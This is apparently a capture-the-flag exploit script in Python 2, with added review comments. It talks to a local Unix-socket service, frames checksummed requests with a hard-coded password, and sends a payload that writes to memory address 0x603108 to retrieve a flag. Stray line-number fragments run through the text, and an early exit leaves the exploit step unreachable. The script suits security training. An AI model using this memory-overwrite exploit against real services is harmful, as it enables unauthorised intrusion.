import socket
import sys
import zlib
from struct import pack, unpack
  5.  
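srv_addr = "\x00secretSock"  # leading NUL = Linux abstract-namespace AF_UNIX address
PASSWORD = "DA777"  # hard-coded shared secret; sent in the clear in every request header
testHash = "f312e0cbe28c22ad7e6c46b989804e2c"
# Request header as built by sendData(): 8-byte checksum field + PASSWORD + 1-byte operation.
BUFFER_HEADER_LENGTH = 8 + len(PASSWORD) + 1
BUFFER_LENGTH = 269  # total size of one request frame (header + zero-padded body)
ANSWER_PACKET_LENGTH = 256  # maximum bytes read back per request

OVERWRITE_ADDR = 0x603108
# 16 filler bytes; only this value is used (earlier int/commented variants were dead code).
OVERWRITE_DATA_ADDR = '\xff' * 16  # offset to flag location (which is empty ATM)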
  17.  
  18.  
# Module-level client socket, created at import time. connectToServer() connects it
# and sendData() writes to / reads from it directly; nothing else owns it.
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
  20.  
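def hexdump(src, length=16):
    """Return a hex + ASCII dump of *src*, one line per *length* bytes.

    Args:
        src: byte string (py2 ``str``) to dump; each element is read with ``ord``.
        length: number of bytes shown per line (default 16).

    Returns:
        A string with one ``"%04x <hex bytes> <printable>\\n"`` line per chunk.
        Non-printable bytes and anything above 0x7f are rendered as ``'.'``.
    """
    # Printable map for codes 0..255: a byte is printable when repr() of its
    # character is a bare quoted char (length 3). Only codes <= 127 are looked up.
    printable_map = ''.join(
        chr(code) if len(repr(chr(code))) == 3 else '.' for code in range(256)
    )
    lines = []
    for offset in range(0, len(src), length):
        chunk = src[offset:offset + length]
        hex_bytes = ' '.join("%02x" % ord(ch) for ch in chunk)
        ascii_bytes = ''.join(
            printable_map[ord(ch)] if ord(ch) <= 127 else '.' for ch in chunk
        )
        # Pad the hex column to length*3 so the ASCII column lines up on every row.
        lines.append("%04x %-*s %s\n" % (offset, length * 3, hex_bytes, ascii_bytes))
    return ''.join(lines)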
  30.  
def db(v):
    """Encode *v* as a single unsigned byte."""
    fmt = "<B"
    return pack(fmt, v)
  33.  
def dw(v):
    """Encode *v* as a little-endian unsigned 16-bit word."""
    fmt = "<H"
    return pack(fmt, v)
  36.  
def dd(v):
    """Encode *v* as a little-endian unsigned 32-bit dword."""
    fmt = "<I"
    return pack(fmt, v)
  39.  
def dq(v):
    """Encode *v* as a little-endian unsigned 64-bit qword."""
    fmt = "<Q"
    return pack(fmt, v)
  42.  
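def rb(v):
    """Read an unsigned byte from the start of *v*.

    Slices one element instead of using ``v[0]`` so the call works whether
    indexing yields a 1-char str (py2) or an int (py3 bytes), matching rw/rd/rq.
    Raises struct.error if *v* is empty.
    """
    return unpack("<B", v[:1])[0]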
  45.  
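def rw(v):
    """Read a little-endian unsigned 16-bit word from the start of *v*.

    Raises struct.error if *v* holds fewer than 2 bytes.
    """
    return unpack("<H", v[:2])[0]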
  48.  
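def rd(v):
    """Read a little-endian unsigned 32-bit dword from the start of *v*.

    Raises struct.error if *v* holds fewer than 4 bytes.
    """
    return unpack("<I", v[:4])[0]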
  51.  
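def rq(v):
    """Read a little-endian unsigned 64-bit qword from the start of *v*.

    Raises struct.error if *v* holds fewer than 8 bytes.
    """
    return unpack("<Q", v[:8])[0]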
  54.  
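def connectToServer():
    """Connect the module-level ``sock`` to ``srv_addr`` and return it.

    On a connection failure the error is printed as a single formatted line
    and the process exits with status 1.

    Returns:
        The connected module-level socket object.
    """
    try:
        sock.connect(srv_addr)
    except socket.error as msg:  # ``as`` form works on py2.6+ and py3
        print("Socket connect error: %s" % msg)
        sys.exit(1)

    return sock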
  63.  
  64.  
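def sendData(buf, operation):
    """Send one fixed-size request on the module-level ``sock`` and return the reply.

    The frame is ``BUFFER_LENGTH`` bytes: an 8-byte checksum, ``PASSWORD``, a
    1-byte operation code, then *buf* zero-padded to fill the frame. The checksum
    is the Adler-32 of the frame computed with the checksum field set to zero.
    The password travels in the clear and Adler-32 is a checksum, not a MAC, so
    the frame is protected against accidental corruption only.

    Args:
        buf: request body (py2 ``str``); "" yields an all-zero body. Must fit in
            ``BUFFER_LENGTH - BUFFER_HEADER_LENGTH`` bytes.
        operation: operation code; must be an ``int`` in 0..255 (packed as one byte).

    Returns:
        The bytes received from the server (up to ``ANSWER_PACKET_LENGTH``), or
        "" when the arguments were rejected. An empty reply is also "", so callers
        that test the result for truth cannot tell the two cases apart.
    """
    body_len = BUFFER_LENGTH - BUFFER_HEADER_LENGTH
    if len(buf) == 0:
        buf = "\x00" * body_len  # create empty buffer
    else:
        buf += "\x00" * (body_len - len(buf))  # fill with zeros (no-op when too long)

    if not isinstance(operation, int):
        print("Operation must be int")
        return ""

    if len(buf) != body_len:
        print("buffer length (%d) is too long or too short!" % len(buf))
        print(hexdump(buf))
        return ""

    # Header with a zeroed checksum placeholder; it is patched in below.
    header = dq(0)
    header += PASSWORD
    header += db(operation)

    payload = header + buf
    # Mask to 32 bits: on py2 adler32 may return a negative int, which "<Q" refuses.
    payload_hash = zlib.adler32(payload) & 0xffffffff
    payload = dq(payload_hash) + payload[8:]

    # sendall() keeps writing until the whole frame is out (or raises), so a
    # partial send is no longer silently followed by a recv().
    sock.sendall(payload)

    # A single recv() may return fewer than ANSWER_PACKET_LENGTH bytes; the reply
    # framing is not visible here, so whatever the first read delivers is returned.
    data = sock.recv(ANSWER_PACKET_LENGTH)
    print("Recived %d bytes" % len(data))
    print(hexdump(data))

    return data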
  97.  
# --- Script body (runs at import). Indentation was lost in the paste; it is
# reconstructed here with each one-statement body nested under its `if`. ---
print 'Connecting to server...'
connectToServer()
if sendData("",1): # init connection (and server init db data)
    print("Connected successfully")

# populate db
sendData("", 4)

# Three operation-3 requests, each carrying an 8-byte little-endian multiple of
# 256 as the body; sendData() zero-pads the rest of the frame.
payload = dq(1 * 256)
if sendData(payload, 3):
    print "Done 0"
payload = dq(2 * 256)
if sendData(payload, 3):
    print "Done 1"
payload = dq(3 * 256)
if sendData(payload, 3):
    print "Done 2"
# NOTE(review): read at top level, these two lines end the script here and the
# "overwrite payload" section below is unreachable; if they were meant to be
# nested under the last `if`, that section runs only when the third send returned
# an empty reply. Confirm the intended nesting. `exit` is the site-module helper;
# sys.exit(0) is the portable spelling.
sock.close()
exit(0)
  117.  
# overwrite payload
# Body = testHash + OVERWRITE_DATA_ADDR + 8-byte little-endian OVERWRITE_ADDR;
# sendData() zero-pads it to the frame size and sends it with operation code 2.
payload = testHash
payload += OVERWRITE_DATA_ADDR
payload += dq(OVERWRITE_ADDR)
print 'Sending exploit...'
# sendData() returns "" when it rejects the arguments or the reply is empty, so
# the follow-up request is skipped in both cases.
if sendData(payload, 2):
    # get flag
    print 'Getting flag...'
    sendData("", 4)

print 'closing socket'
sock.close()